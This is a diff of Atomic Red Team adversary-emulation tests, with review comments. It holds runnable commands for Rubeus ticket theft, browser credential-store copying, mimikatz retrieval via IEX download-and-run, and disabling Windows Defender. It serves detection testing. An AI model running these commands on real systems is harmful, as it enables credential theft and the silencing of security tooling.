@@ -57,43 +58,36 @@ atomic_tests: description: domain type: string default: $Env:USERDOMAIN - rubeus_path: - description: Path of the Rubeus binary - type: path - default: $Env:TEMP\rubeus.exe rubeus_url: description: URL of Rubeus executable type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe - psexec_path: - description: Path of the PsExec binary - type: string - default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: - description: | - Rubeus must exist on disk at specified location (#{rubeus_path}) + Rubeus must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" prereq_command: | - if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe") {exit 0} else {exit 1} get_prereq_command: | - Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-Webrequest -Uri #{rubeus_url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" - description: | - PsExec must exist on disk at specified location (#{psexec_path}) + PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" prereq_command: | - if (Test-Path #{psexec_path}) {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive 
PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force + New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: name: powershell elevation_required: true command: | - #{psexec_path} -accepteula \\#{target} -w c:\ -c #{rubeus_path} asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi - Set-Location $env:TEMP + & "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula \\#{target} -w c:\ -c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi + Set-Location PathToAtomicsFolder\..\ExternalPayloads Move-Item -Force "\\#{target}\c$\ticket.kirbi" ticket.kirbi Write-Host "Successfully retrieved TGT from '#{target}', now requesting a TGS from local" - & "#{rubeus_path}" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt - Remove-Item $env:TEMP\ticket.kirbi - & "#{rubeus_path}" purge + & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\ticket.kirbi + & "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" purge \ No newline at end of file diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index d8e5cf04..4fd7dd88 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml 
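Review bot: The executor in this hunk now does `Set-Location PathToAtomicsFolder\..\ExternalPayloads` with an unquoted path (the neighbouring `& "PathToAtomicsFolder\..."` calls are quoted), and `Set-Location` changes the working directory of the caller's session for everything that runs afterwards, including any later atomics. Use `Push-Location "PathToAtomicsFolder\..\ExternalPayloads"` and add `Pop-Location` after the final `rubeus.exe purge`, or pass absolute paths to `Move-Item` and `/ticket:` and drop the directory change entirely. Note also that `#{password}` is passed on the PsExec command line, so it will appear in process-creation telemetry on both hosts; that is inherent to the technique but worth a sentence in the test description.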
@@ -6,7 +6,7 @@ atomic_tests: description: | A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}. - Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb. + Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of PathToAtomicsFolder\..\ExternalPayloads\sysinternals\passwordsdb. Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml) supported_platforms: @@ -15,7 +15,7 @@ atomic_tests: file_path: description: File path for modified Sysinternals type: string - default: $env:TEMP + default: PathToAtomicsFolder\..\ExternalPayloads dependency_executor_name: powershell dependencies: - description: | 
@@ -90,19 +90,20 @@ atomic_tests: Chrome must be installed prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' get_prereq_command: | - $installer = "$env:temp\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi msiexec /i $installer /qn Start-Process -FilePath "chrome.exe" Stop-Process -Name "chrome" executor: name: powershell command: | - Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination $env:temp - Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination $env:temp + Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination PathToAtomicsFolder\..\ExternalPayloads + Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination PathToAtomicsFolder\..\ExternalPayloads cleanup_command: | - Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore - Remove-Item -Path "$env:temp\Login Data For Account" -Force -ErrorAction Ignore + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data For Account" -Force -ErrorAction Ignore - name: Simulating access to Opera Login Data auto_generated_guid: 28498c17-57e4-495a-b0be-cc1e36de408b description: | 
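Review bot: The executor's `Copy-Item ... -Destination PathToAtomicsFolder\..\ExternalPayloads` assumes the directory exists, but it is only created inside get_prereq_command, which does not run when Chrome is already installed; as far as I can tell Copy-Item then treats `ExternalPayloads` as a file name, writes the Login Data database to it, and cleanup_command's `Remove-Item ...\ExternalPayloads\Login Data` leaves that copy of the credential store on disk. Prepend `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads" -ErrorAction Ignore -Force | Out-Null` to the executor command; the Opera, Firefox and Edge tests further down have the same shape. Minor: get_prereq_command sets `$installer` and then spells the same path out again, unquoted, in `Invoke-WebRequest -OutFile`, so `-OutFile $installer` would keep a single quoted copy.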
@@ -115,8 +116,9 @@ atomic_tests: Opera must be installed prereq_command: 'if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}' get_prereq_command: | - $installer = "$env:temp\OperaStandaloneInstaller.exe" - Invoke-WebRequest -OutFile $env:temp\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + $installer = "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0' Start-Sleep -s 180 Stop-Process -Name "opera" @@ -128,9 +130,9 @@ atomic_tests: executor: name: powershell command: | - Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp + Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination PathToAtomicsFolder\..\ExternalPayloads cleanup_command: | - Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Force -ErrorAction Ignore - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | 
@@ -144,8 +146,9 @@ atomic_tests: Firefox must be installed prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}' get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} - $installer = "$env:temp\firefoxsetup.exe" + $installer = "PathToAtomicsFolder\..\ExternalPayloads\firefoxsetup.exe" (New-Object Net.WebClient).DownloadFile($url,$installer) Start-Process $installer -ArgumentList '/S' -Wait - description: | @@ -160,9 +163,9 @@ atomic_tests: executor: name: powershell command: | - Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -Recurse + Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination PathToAtomicsFolder\..\ExternalPayloads -Force -Recurse cleanup_command: | - Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ignore -Recurse + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Profiles" -Force -ErrorAction Ignore -Recurse - name: Simulating access to Windows Edge Login Data auto_generated_guid: a6a5ec26-a2d1-4109-9d35-58b867689329 description: | 
@@ -188,9 +191,9 @@ atomic_tests: executor: name: powershell command: | - Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination $env:temp\Edge -Force -Recurse + Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination PathToAtomicsFolder\..\ExternalPayloads\Edge -Force -Recurse cleanup_command: | - Remove-Item -Path "$env:temp\Edge" -Force -ErrorAction Ignore -Recurse + Remove-Item -Path "PathToAtomicsFolder\..\ExternalPayloads\Edge" -Force -ErrorAction Ignore -Recurse - name: Decrypt Mozilla Passwords with Firepwd.py auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381 description: | @@ -202,7 +205,7 @@ atomic_tests: Firepwd_Path: description: Filepath for Firepwd.py type: string - default: $env:temp\Firepwd.py + default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py Out_Filepath: description: Filepath to output results to type: string @@ -228,8 +231,9 @@ atomic_tests: prereq_command: | if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -erroraction silentlycontinue) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "$env:temp\firefox.msi" - msiexec.exe /i "$env:temp\firefox.msi" /quiet + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" + msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" /quiet sleep -s 30 start-process "$env:programfiles\Mozilla Firefox\firefox.exe". sleep -s 5 
@@ -239,25 +243,25 @@ atomic_tests: prereq_command: | if (Test-Path "#{VS_CMD_Path}") {exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "$env:temp\VS_BuildTools.exe" - write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from $env:temp\VS_BuildTools.exe." + invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe" + write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from PathToAtomicsFolder\..\ExternalPayloads\VS_BuildTools.exe." - description: | Python must be installed prereq_command: | if (Test-Path "#{Python_Path}") {exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "$env:temp\python_setup.exe" - Start-Process -FilePath $env:TEMP\python_setup.exe -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait + invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" + Start-Process -FilePath PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | Pip must be installed. 
prereq_command: | $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) if (pip -v) {exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "$env:temp\ez_setup.py" - invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "$env:temp\get-pip.py" - cmd /c "$env:temp\ez_setup.py" - cmd /c "$env:temp\get-pip.py" + invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" + invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" - description: | Pycryptodome library must be installed prereq_command: | @@ -426,8 +430,9 @@ atomic_tests: prereq_command: | 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' get_prereq_command: | - $installer = "$env:temp\ChromeStandaloneSetup64.msi" - Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + $installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi msiexec /i $installer /qn Start-Process -FilePath "chrome.exe" Stop-Process -Name "chrome" 
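Review bot: The three downloads in the -239 hunk (VS_BuildTools.exe, python_setup.exe, ez_setup.py/get-pip.py) write into ExternalPayloads without the `New-Item -Type Directory` guard the commit added to the other get_prereq_commands; each dependency only runs when its own prereq fails, so if the earlier Firefox dependency was already satisfied the directory may not exist and Invoke-WebRequest fails with a missing-path error. Add `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null` as the first line of each of the three get_prereq_commands. Separately, `cmd /c "...\ez_setup.py"` relies on the .py file association, and as far as I know bootstrap.pypa.io no longer serves ez_setup.py, so that step probably errors before get-pip runs; worth verifying.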
@@ -445,13 +450,13 @@ atomic_tests: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T155.003/src/LoginData?raw=true" -Outfile: "PathToAtomicsFolder\T1555.003\src\Login Data" executor: command: | - Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "$env:temp" > $null + Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\" > $null cd "$env:PathToAtomicsFolder\T1555.003\bin" .\BrowserCollector.exe cleanup_command: | Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null - Copy-Item "$env:temp" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null - Remove-Item "$env:temp\Login Data" > $null + Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null + Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" > $null name: powershell diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml index 3740e47f..4df8e5a3 100644 --- a/atomics/T1558.001/T1558.001.yaml +++ b/atomics/T1558.001/T1558.001.yaml @@ -29,7 +29,7 @@ atomic_tests: mimikatz_path: description: Mimikatz windows executable type: path - default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: - description: | 
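Review bot: cleanup_command's `Copy-Item "PathToAtomicsFolder\..\ExternalPayloads" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data"` names the ExternalPayloads directory itself rather than the backed-up database (the old `$env:temp` line had the same mistake), so the user's real Login Data is never restored and the backup is then deleted by the next line. It should be `Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null`. The executor's first Copy-Item also assumes ExternalPayloads exists, but only the Chrome-install dependency creates it and that runs only when Chrome is absent, so a `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads" -ErrorAction Ignore -Force | Out-Null` before the backup would avoid it landing in a file named ExternalPayloads.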
@@ -39,6 +39,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } diff --git a/atomics/T1558.002/T1558.002.yaml b/atomics/T1558.002/T1558.002.yaml index a552f63d..946a80cf 100644 --- a/atomics/T1558.002/T1558.002.yaml +++ b/atomics/T1558.002/T1558.002.yaml @@ -32,7 +32,7 @@ atomic_tests: mimikatz_path: description: Mimikatz windows executable type: path - default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: - description: | @@ -42,6 +42,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 3b9f1777..54394ff1 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml 
@@ -37,7 +37,7 @@ atomic_tests: local_folder: description: Local path of Rubeus executable type: path - default: $Env:temp + default: PathToAtomicsFolder\..\ExternalPayloads local_executable: description: name of the rubeus executable type: string @@ -67,6 +67,7 @@ atomic_tests: prereq_command: | if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} executor: command: | diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml index 6d8c2cad..98b6f6e2 100644 --- a/atomics/T1558.004/T1558.004.yaml +++ b/atomics/T1558.004/T1558.004.yaml @@ -12,7 +12,7 @@ atomic_tests: local_folder: description: Local path of Rubeus executable type: path - default: $Env:temp + default: PathToAtomicsFolder\..\ExternalPayloads local_executable: description: name of the rubeus executable type: string @@ -38,6 +38,7 @@ atomic_tests: prereq_command: | if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} executor: command: | diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 624a52d9..1a6a8394 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml 
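Review bot: In the T1558.003 -67 hunk the added `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\"` hardcodes the directory while the download on the next line goes to `#{local_folder}\#{local_executable}`, which the user can override; with a custom local_folder the directory that gets created and the download target no longer match. Use the input instead: `New-Item -Type Directory "#{local_folder}" -ErrorAction Ignore -Force | Out-Null`, and quote `-OutFile "#{local_folder}\#{local_executable}"` while there. The T1558.004 -38 hunk has the same pattern.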
@@ -107,9 +107,10 @@ atomic_tests: cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' get_prereq_command: | IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) - if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + if(Invoke-WebRequestVerifyHash "#{winzip_url}" "PathToAtomicsFolder\..\ExternalPayloads\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue - cmd /c "$env:Temp\winzip.exe" + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\winzip.exe" } executor: name: command_prompt diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 31da018a..6e845d8b 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml 
@@ -186,18 +186,19 @@ atomic_tests: - description: | Sysmon must be downloaded prereq_command: | - if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } + if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" - Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force - Remove-Item $env:TEMP\Sysmon.zip -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip PathToAtomicsFolder\..\ExternalPayloads\Sysmon -Force + Remove-Item PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip -Force - description: | sysmon must be Installed prereq_command: | if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else - { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} + { Set-Location PathToAtomicsFolder\..\ExternalPayloads\Sysmon\; .\Sysmon.exe -accepteula -i} - description: | sysmon filter must be loaded prereq_command: | @@ -564,7 +565,7 @@ atomic_tests: DefenderControlExe: description: Path to Defender Control software version 1.6. type: string - default: $env:temp\DefenderControl\DefenderControl\DefenderControl.exe + default: PathToAtomicsFolder\..\ExternalPayloads\DefenderControl\DefenderControl\DefenderControl.exe dependency_executor_name: powershell dependencies: - description: | 
@@ -572,8 +573,9 @@ atomic_tests: prereq_command: | if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1} get_prereq_command: | - Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic - expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip" + expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\defendercontrol.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\DefenderControl" executor: command: | cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null @@ -594,7 +596,7 @@ atomic_tests: AdvancedRun_Location: description: Path of Advanced Run executable type: path - default: '$env:temp\AdvancedRun.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\AdvancedRun.exe' delete_defender_folder: description: Set to 1 to also delete the Windows Defender folder type: integer 
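Review bot: DefenderControl.zip is fetched from a web.archive.org snapshot with no integrity check and the extracted binary is then run elevated to switch Defender off, so a tampered archive would execute with full rights; the same PR already uses `Invoke-WebRequestVerifyHash` for WinZip in T1560.001, and since the snapshot URL is fixed a pinned SHA256 is stable here too. The switch from `Start-BitsTransfer ... -dynamic` to `Invoke-WebRequest` also changes how archive.org's redirect chain is followed, so it is worth confirming the plain download still yields the zip rather than an HTML page before `expand-archive` runs.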
@@ -606,8 +608,9 @@ atomic_tests: prereq_command: | if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip" - Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" + Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force executor: command: | Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{} 
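Review bot: The advancedrun.zip download stays on plain `http://www.nirsoft.net/utils/advancedrun.zip`, and the extracted binary is then run with `/RunAs 8` to stop WinDefend, so an on-path attacker can substitute the archive and obtain TrustedInstaller-level execution; switch to `https://www.nirsoft.net/utils/advancedrun.zip`, which the host serves, and ideally verify a pinned hash with `Invoke-WebRequestVerifyHash` as T1560.001 does in this same PR. Minor: `Expand-Archive ... -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force` unpacks the whole archive into the shared directory, so any other test's file with a colliding name is silently overwritten; extracting into an `AdvancedRun` subfolder and adjusting the `AdvancedRun_Location` default would avoid that.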
